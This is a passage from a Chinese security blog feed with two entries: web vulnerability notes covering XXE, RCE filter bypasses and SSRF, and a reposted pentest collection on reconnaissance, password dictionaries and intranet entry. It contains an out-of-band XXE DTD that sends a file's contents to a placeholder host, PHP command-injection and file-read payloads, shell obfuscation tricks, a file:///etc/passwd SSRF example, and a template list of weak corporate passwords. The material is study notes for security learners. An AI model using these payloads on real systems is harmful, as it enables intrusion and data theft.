code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">updateProfile</span><span style="color: #89DDFF"> [</span></span><span class="line"><span style="color: #89DDFF"> <!</span><span style="color: #F78C6C">ENTITY</span><span style="color: #89DDFF"> % </span><span style="color: #BABED8">file</span><span style="color: #F78C6C"> SYSTEM </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">php://filter/read=convert.base64-encode/resource=./target.php</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"> <!</span><span style="color: #F78C6C">ENTITY</span><span style="color: #89DDFF"> % </span><span style="color: #BABED8">dtd</span><span style="color: #F78C6C"> SYSTEM </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">http://xxx.xxx.xxx/evil.dtd</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"> %dtd;</span></span><span class="line"><span style="color: #89DDFF"> %send;</span></span><span class="line"><span style="color: #89DDFF">]></span></span></code></pre></div><p>evil.dtd:</p><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8"><!ENTITY % all</span></span><span class="line"><span style="color: #BABED8"> "<!ENTITY </span><span style="color: #89DDFF">&</span><span style="color: #BABED8">#x25</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> send SYSTEM 'http://xxx.xxx.xxx/?data=%file;'>"</span></span><span class="line"><span style="color: #BABED8">></span></span><span class="line"><span style="color: #BABED8">%all;</span></span></code></pre></div></li></ul><h3 id="利用场景"><a href="#利用场景" class="headerlink" title="利用场景"></a>利用场景</h3><ul><li><p>svg</p></li><li><p>excel</p><p><a href="https://xz.aliyun.com/t/3741">利用EXCEL进行XXE攻击 - 先知社区 (aliyun.com)</a></p></li></ul><h3 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h3><ul><li>禁用dtd实体引用</li><li>过滤关键词</li></ul><h2 id="RCE-–-远程代码执行漏洞"><a href="#RCE-–-远程代码执行漏洞" class="headerlink" title="RCE – 远程代码执行漏洞"></a>RCE – 远程代码执行漏洞</h2><h3 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h3><ul><li><p><strong>系统命令执行函数</strong></p><div class="language-apl"><button title="Copy code" class="copy"></button><span class="lang">apl</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">system</span><span style="color: #89DDFF">()</span></span><span class="line"><span style="color: #BABED8">passthru</span><span style="color: #89DDFF">()</span></span><span class="line"><span style="color: #BABED8">exec</span><span style="color: #89DDFF">()</span></span><span class="line"><span style="color: #BABED8">shell_exec</span><span style="color: #89DDFF">()</span></span><span class="line"><span style="color: #BABED8">popen</span><span style="color: #89DDFF">()</span></span><span class="line"><span style="color: #BABED8">proc_open</span><span style="color: #89DDFF">()</span></span><span class="line"><span style="color: #BABED8">pcntl_exec</span><span style="color: #89DDFF">()</span></span></code></pre></div></li><li><p><strong>系统命令拼接方式</strong></p><ul><li><code>|</code> , <code>||</code></li><li><code>&</code>, <code>&&</code></li><li><code>;</code></li><li><code>%0a</code></li></ul></li></ul><h3 id="绕过-1"><a href="#绕过-1" class="headerlink" title="绕过"></a>绕过</h3><p><a href="https://blog.csdn.net/jdhellfire/article/details/121969060">常见操作系统命令注入思路_命令注入 bypass-CSDN博客</a></p><h4 id="通配符绕过"><a href="#通配符绕过" class="headerlink" title="通配符绕过"></a>通配符绕过</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #82AAFF">system</span><span style="color: #89DDFF">(</span><span style="color: #BABED8">‘tac fla</span><span style="color: #89DDFF">*</span><span style="color: #89DDFF">.</span><span style="color: #BABED8">php’</span><span style="color: #89DDFF">);</span></span></code></pre></div><h4 id="参数逃逸"><a href="#参数逃逸" class="headerlink" title="参数逃逸"></a>参数逃逸</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #82AAFF">eval</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">GET</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]);&</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">system</span><span style="color: #89DDFF">(</span><span style="color: #BABED8">‘tac flag</span><span style="color: #89DDFF">.</span><span style="color: #BABED8">php’</span><span style="color: #89DDFF">);</span></span></code></pre></div><h4 id="包含-伪协议"><a href="#包含-伪协议" class="headerlink" title="包含&伪协议"></a>包含&伪协议</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">include</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_ GET</span><span style="color: #89DDFF">[</span><span style="color: #BABED8">a</span><span style="color: #89DDFF">]?></span><span style="color: #C792EA">&</span><span style="color: #BABED8">a</span><span style="color: #89DDFF">=</span><span style="color: #BABED8">data</span><span style="color: #89DDFF">:</span><span style="color: #676E95; font-style: italic">//text/plain,<?=system('tac flag.php');</span><span style="color: #89DDFF">?></span></span><span class="line"><span style="color: #BABED8">include</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #BABED8">a</span><span style="color: #89DDFF">]?></span><span style="color: #C792EA">&</span><span style="color: #BABED8">a</span><span style="color: #89DDFF">=</span><span style="color: #BABED8">php</span><span style="color: #89DDFF">:</span><span style="color: #676E95; font-style: italic">//filter/read=convert.base64-encode/resource=flag.php</span></span></code></pre></div><h4 id="花括号"><a href="#花括号" class="headerlink" title="花括号{}"></a>花括号<code>{}</code></h4><ul><li>在Linux bash中还可以使用<code>{xxxx}</code>来执行系统命令</li></ul><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">{</span><span style="color: #FFCB6B">cat,flag}</span></span></code></pre></div><h4 id="斜杠"><a href="#斜杠" class="headerlink" title="斜杠"></a>斜杠</h4><ul><li><p>路径 /</p></li><li><p>\是在正则等语法里面,表示后面跟的字符是正常字符,不需要转义。</p></li><li><p>也就意味着,我们可以在rce漏洞,过滤掉<code>cat ls</code>等命令时候,直接使用<code>ca\t</code>来实现绕过</p></li></ul><h4 id="空格过滤"><a href="#空格过滤" class="headerlink" title="空格过滤"></a>空格过滤</h4><ul><li>< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等</li></ul><h4 id="一些命令分隔符"><a href="#一些命令分隔符" class="headerlink" title="一些命令分隔符"></a>一些命令分隔符</h4><p>linux中:<code>%0a(回车) 、%0d(换行) 、; 、& 、| 、&&、||</code><br>windows中:<code>%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符)</code></p><h3 id="黑名单绕过"><a href="#黑名单绕过" class="headerlink" title="黑名单绕过"></a>黑名单绕过</h3><h4 id="拼接绕过"><a href="#拼接绕过" class="headerlink" title="拼接绕过"></a>拼接绕过</h4><ul><li>利用偶读拼接方法绕过黑名单:<code>a=fl;b=ag;cat $a$b</code></li><li>利用.拼接绕过(sy.(st).em)</li></ul><h4 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h4><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Y2F0wqAK</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">|</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">base64</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-d</span></span></code></pre></div><h4 id="单引号和双引号绕过"><a href="#单引号和双引号绕过" class="headerlink" title="单引号和双引号绕过"></a>单引号和双引号绕过</h4><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">c</span><span style="color: #FFCB6B">''</span><span style="color: #FFCB6B">t</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">flag</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #FFCB6B">ca</span><span style="color: #FFCB6B">""</span><span style="color: #FFCB6B">t</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">flag</span></span></code></pre></div><h4 id="利用Shell-特殊变量绕过"><a href="#利用Shell-特殊变量绕过" class="headerlink" title="利用Shell 特殊变量绕过"></a>利用Shell 特殊变量绕过</h4><p>第一个参数是1,第二个参数是2。而参数不存在时其值为空</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">ca$@t</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">fla</span><span style="color: #BABED8">$</span><span style="color: #C3E88D">@g</span></span><span class="line"><span style="color: #FFCB6B">ca$1t</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">fla</span><span style="color: #BABED8">$2g</span></span></code></pre></div><h3 id="linux中查看文件内容"><a href="#linux中查看文件内容" class="headerlink" title="linux中查看文件内容"></a>linux中查看文件内容</h3><p>cat、tac、more、less、head、tail、nl、sed、sort、uniq</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">more:一页一页的显示档案内容</span></span><span class="line"><span style="color: #babed8">less:与 more 类似</span></span><span class="line"><span style="color: #babed8">head:查看头几行</span></span><span class="line"><span style="color: #babed8">tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示</span></span><span class="line"><span style="color: #babed8">tail:查看尾几行</span></span><span class="line"><span style="color: #babed8">nl:显示的时候,顺便输出行号</span></span><span class="line"><span style="color: #babed8">od:以二进制的方式读取档案内容</span></span><span class="line"><span style="color: #babed8">vi:一种编辑器,这个也可以查看</span></span><span class="line"><span style="color: #babed8">vim:一种编辑器,这个也可以查看</span></span><span class="line"><span style="color: #babed8">sort:可以查看</span></span><span class="line"><span style="color: #babed8">uniq:可以查看</span></span><span class="line"><span style="color: #babed8">file -f:报错出具体内容</span></span></code></pre></div><h2 id="SSRF-–-服务器端请求伪造"><a href="#SSRF-–-服务器端请求伪造" class="headerlink" title="SSRF – 服务器端请求伪造"></a>SSRF – 服务器端请求伪造</h2><ul><li>SSRF 形成的原因大都是由于服务端提供了<strong>从其他服务器应用</strong>获取数据的功能且没有对目标地址做过滤与限制。</li></ul><h3 id="SSRF漏洞挖掘"><a href="#SSRF漏洞挖掘" class="headerlink" title="SSRF漏洞挖掘"></a>SSRF漏洞挖掘</h3><h4 id="漏洞产生场景"><a href="#漏洞产生场景" class="headerlink" title="漏洞产生场景"></a>漏洞产生场景</h4><ul><li><p>分享:通过URL地址分享网页内容</p></li><li><p>转码服务: 通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览</p></li><li><p>在线翻译:通过URL地址翻译对应文本的内容</p></li><li><p>图片、文章收藏功能</p></li><li><p>未公开的api实现以及其他调用URL的功能</p></li><li><p>图片加载与下载:通过URL地址加载或下载图片</p></li><li><p>从URL关键字中寻找, 利用google 语法加上这些关键字去寻找SSRF漏洞</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">share wap url link src source target u display sourceURl imageURL domain</span></span></code></pre></div></li></ul><h4 id="产生SSRF漏洞的函数"><a href="#产生SSRF漏洞的函数" class="headerlink" title="产生SSRF漏洞的函数"></a>产生SSRF漏洞的函数</h4><h5 id="file-get-contents"><a href="#file-get-contents" class="headerlink" title="file_get_contents"></a>file_get_contents</h5><p>从指定url获取文件:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">content </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">file_get_contents</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]);</span><span style="color: #BABED8"> </span></span></code></pre></div><h5 id="fsockopen"><a href="#fsockopen" class="headerlink" title="fsockopen()"></a>fsockopen()</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$fp = fsockopen($host, intval($port), $errno, $errstr, 30); </span></span></code></pre></div><h5 id="curl-exec"><a href="#curl-exec" class="headerlink" title="curl_exec()"></a>curl_exec()</h5><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">link </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">curlobj </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_init</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> CURLOPT_POST</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">,</span><span style="color: #BABED8">CURLOPT_URL</span><span style="color: #89DDFF">,$</span><span style="color: #BABED8">link</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> CURLOPT_RETURNTRANSFER</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">result</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">curl_exec</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">);</span></span></code></pre></div><h3 id="SSRF中URL的伪协议"><a href="#SSRF中URL的伪协议" class="headerlink" title="SSRF中URL的伪协议"></a>SSRF中URL的伪协议</h3><p><strong>当我们发现SSRF漏洞后,首先要做的事情就是测试所有可用的URL伪协议</strong></p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>file:/// 从文件系统中获取文件内容,如,xxxxxx.com/index.php?url=file:///etc/passwd<br>dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info:<br>sftp:// SSH文件传输协议或安全文件传输协议<br>ldap:// 轻量级目录访问协议, url=ldap://localhost:1337/%0astats%0aqui<br>tftp:// 简单文件传输协议<br>gopher:// 分布式文档传递服务,可使用<strong>gopherus</strong>生成payload</p></blockquote>]]></content>
<summary type="html"><h1 id="WEB攻防-通用漏洞"><a href="#WEB攻防-通用漏洞" class="headerlink" title="WEB攻防-通用漏洞"></a>WEB攻防-通用漏洞</h1><p>大型靶场<a href="https://vulhub.org/#/envi</summary>
</entry>
<entry>
<title>(转)知识点合集</title>
<link href="https://myprefer.github.io/post/%E8%BD%AC-%E7%9F%A5%E8%AF%86%E7%82%B9%E5%90%88%E9%9B%86.html"/>
<id>https://myprefer.github.io/post/%E8%BD%AC-%E7%9F%A5%E8%AF%86%E7%82%B9%E5%90%88%E9%9B%86.html</id>
<published>2024-03-05T15:07:07.000Z</published>
<updated>2024-03-11T03:21:52.691Z</updated>
<content type="html"><![CDATA[<p> Author: <a href="https://twitter.com/Evi1cg">Evi1cg</a><br> Blog: <a href="https://evi1cg.github.io/">https://evi1cg.github.io</a></p><h2 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h2><h3 id="开源情报信息收集(OSINT)"><a href="#开源情报信息收集(OSINT)" class="headerlink" title="开源情报信息收集(OSINT)"></a>开源情报信息收集(OSINT)</h3><h4 id="github"><a href="#github" class="headerlink" title="github"></a>github</h4><ul><li>Github_Nuggests(自动爬取Github上文件敏感信息泄露) :<a href="https://github.com/az0ne/Github_Nuggests">https://github.com/az0ne/Github_Nuggests</a></li><li>GSIL(能够实现近实时(15分钟内)的发现Github上泄露的信息) :<a href="https://github.com/FeeiCN/GSIL">https://github.com/FeeiCN/GSIL</a></li><li>x-patrol(小米团队的):<a href="https://github.com/MiSecurity/x-patrol">https://github.com/MiSecurity/x-patrol</a></li></ul><h4 id="whois查询-注册人反查-邮箱反查-相关资产"><a href="#whois查询-注册人反查-邮箱反查-相关资产" class="headerlink" title="whois查询/注册人反查/邮箱反查/相关资产"></a>whois查询/注册人反查/邮箱反查/相关资产</h4><ul><li>站长之家:<a href="http://whois.chinaz.com/?DomainName=target.com&ws=">http://whois.chinaz.com/?DomainName=target.com&ws=</a></li><li>爱站:<a href="https://whois.aizhan.com/target.com/">https://whois.aizhan.com/target.com/</a></li><li>微步在线:<a href="https://x.threatbook.cn/">https://x.threatbook.cn/</a></li><li>IP反查:<a href="https://dns.aizhan.com/">https://dns.aizhan.com/</a></li><li>天眼查:<a href="https://www.tianyancha.com/">https://www.tianyancha.com/</a></li><li>虎妈查:<a href="http://www.whomx.com/">http://www.whomx.com/</a></li><li>历史漏洞查询 :<ul><li>在线查询:<a href="http://wy.zone.ci/">http://wy.zone.ci/</a></li><li>自搭建:<a href="https://github.com/hanc00l/wooyun_public/">https://github.com/hanc00l/wooyun_public/</a></li></ul></li></ul><h4 id="google-hacking"><a href="#google-hacking" class="headerlink" title="google hacking"></a>google hacking</h4><h3 id="创建企业密码字典"><a href="#创建企业密码字典" class="headerlink" title="创建企业密码字典"></a>创建企业密码字典</h3><h4 id="字典列表"><a href="#字典列表" class="headerlink" title="字典列表"></a>字典列表</h4><ul><li>passwordlist:<a href="https://github.com/lavalamp-/password-lists">https://github.com/lavalamp-/password-lists</a></li><li>猪猪侠字典:<a href="https://pan.baidu.com/s/1dFJyedz">https://pan.baidu.com/s/1dFJyedz</a><br><a href="https://github.com/rootphantomer/Blasting_dictionary">Blasting_dictionary</a>(分享和收集各种字典,包括弱口令,常用密码,目录爆破。数据库爆破,编辑器爆破,后台爆破等) </li><li>针对特定的厂商,重点构造厂商相关域名的字典</li></ul><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']</span></span></code></pre></div><h4 id="密码生成"><a href="#密码生成" class="headerlink" title="密码生成"></a>密码生成</h4><ul><li>GenpAss(中国特色的弱口令生成器: <a href="https://github.com/RicterZ/genpAss/">https://github.com/RicterZ/genpAss/</a></li><li>passmaker(可以自定义规则的密码字典生成器) :<a href="https://github.com/bit4woo/passmaker">https://github.com/bit4woo/passmaker</a></li><li>pydictor(强大的密码生成器) :<a href="https://github.com/LandGrey/pydictor">https://github.com/LandGrey/pydictor</a></li></ul><h4 id="邮箱列表获取"><a href="#邮箱列表获取" class="headerlink" title="邮箱列表获取"></a>邮箱列表获取</h4><ul><li>theHarvester :<a href="https://github.com/laramies/theHarvester">https://github.com/laramies/theHarvester</a></li><li>获取一个邮箱以后导出通讯录 </li><li>LinkedInt :<a href="https://github.com/mdsecactivebreach/LinkedInt">https://github.com/mdsecactivebreach/LinkedInt</a></li><li>Mailget:<a href="https://github.com/Ridter/Mailget">https://github.com/Ridter/Mailget</a></li></ul><h4 id="泄露密码查询"><a href="#泄露密码查询" class="headerlink" title="泄露密码查询"></a>泄露密码查询</h4><ul><li>ghostproject: <a href="https://ghostproject.fr/">https://ghostproject.fr/</a></li><li>pwndb: <a href="https://pwndb2am4tzkvold.onion.to/">https://pwndb2am4tzkvold.onion.to/</a></li></ul><h4 id="对企业外部相关信息进行搜集"><a href="#对企业外部相关信息进行搜集" class="headerlink" title="对企业外部相关信息进行搜集"></a>对企业外部相关信息进行搜集</h4><h5 id="子域名获取"><a href="#子域名获取" class="headerlink" title="子域名获取"></a>子域名获取</h5><ul><li>Layer子域名挖掘机4.2纪念版 </li><li>subDomainsBrute :<a href="https://github.com/lijiejie/subDomainsBrute">https://github.com/lijiejie/subDomainsBrute</a></li><li>wydomain :<a href="https://github.com/ring04h/wydomain">https://github.com/ring04h/wydomain</a></li><li>Sublist3r :<a href="https://github.com/aboul3la/Sublist3r">https://github.com/aboul3la/Sublist3r</a></li><li>企查查:<a href="https://www.qcc.com/">https://www.qcc.com/</a></li><li>天眼查:<a href="https://www.tianyancha.com/">https://www.tianyancha.com/</a></li><li>site:target.com:<a href="https://www.google.com/">https://www.google.com</a></li><li>Github代码仓库 </li><li>抓包分析请求返回值(跳转/文件上传/app/api接口等) </li><li>站长帮手links等在线查询网站 </li><li>域传送漏洞</li></ul><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>Linux</p></blockquote><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">dig @ns.example.com example=.com AXFR </span></span></code></pre></div><p>Windows</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">nslookup -type=ns xxx.yyy.cn #查询解析某域名的DNS服务器</span></span><span class="line"><span style="color: #babed8">nslookup #进入nslookup交互模式</span></span><span class="line"><span style="color: #babed8">server dns.domian.com #指定dns服务器</span></span><span class="line"><span style="color: #babed8">ls xxx.yyy.cn #列出域信息</span></span></code></pre></div><ul><li>GetDomainsBySSL.py :<a href="https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&type=note#/">https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&type=note#/</a></li><li>censys.io证书 :<a href="https://censys.io/certificates?q=target.com">https://censys.io/certificates?q=target.com</a></li><li>crt.sh证书查询:<a href="https://crt.sh/?q=%25.target.com">https://crt.sh/?q=%25.target.com</a></li><li>shadon :<a href="https://www.shodan.io/">https://www.shodan.io/</a></li><li>zoomeye :<a href="https://www.zoomeye.org/">https://www.zoomeye.org/</a></li><li>fofa :<a href="https://fofa.so/">https://fofa.so/</a></li><li>censys:<a href="https://censys.io/">https://censys.io/</a></li><li>dnsdb.io :<a href="https://dnsdb.io/zh-cn/search?q=target.com">https://dnsdb.io/zh-cn/search?q=target.com</a></li><li>api.hackertarget.com :<a href="http://api.hackertarget.com/reversedns/?q=target.com">http://api.hackertarget.com/reversedns/?q=target.com</a></li><li>community.riskiq.com :<a href="https://community.riskiq.com/Search/target.com">https://community.riskiq.com/Search/target.com</a></li><li>subdomain3 :<a href="https://github.com/yanxiu0614/subdomain3">https://github.com/yanxiu0614/subdomain3</a></li><li>FuzzDomain :<a href="https://github.com/Chora10/FuzzDomain">https://github.com/Chora10/FuzzDomain</a></li><li>dnsdumpster.com :<a href="https://dnsdumpster.com/">https://dnsdumpster.com/</a></li><li>phpinfo.me :<a href="https://phpinfo.me/domain/">https://phpinfo.me/domain/</a></li><li>dns开放数据接口 :<a href="https://dns.bufferover.run/dns?q=baidu.com">https://dns.bufferover.run/dns?q=baidu.com</a></li></ul><h2 id="进入内网"><a href="#进入内网" class="headerlink" title="进入内网"></a>进入内网</h2><h3 id="基于企业弱账号漏洞"><a href="#基于企业弱账号漏洞" class="headerlink" title="基于企业弱账号漏洞"></a>基于企业弱账号漏洞</h3><ul><li>VPN(通过邮箱,密码爆破,社工等途径获取VPN) </li><li>企业相关运维系统(zabbix等)</li></ul><h3 id="基于系统漏洞进入"><a href="#基于系统漏洞进入" class="headerlink" title="基于系统漏洞进入"></a>基于系统漏洞进入</h3><ul><li>Metasploit(漏洞利用框架):<a href="https://github.com/rapid7/metasploit-framework">https://github.com/rapid7/metasploit-framework</a> </li><li>漏洞利用脚本</li></ul><h3 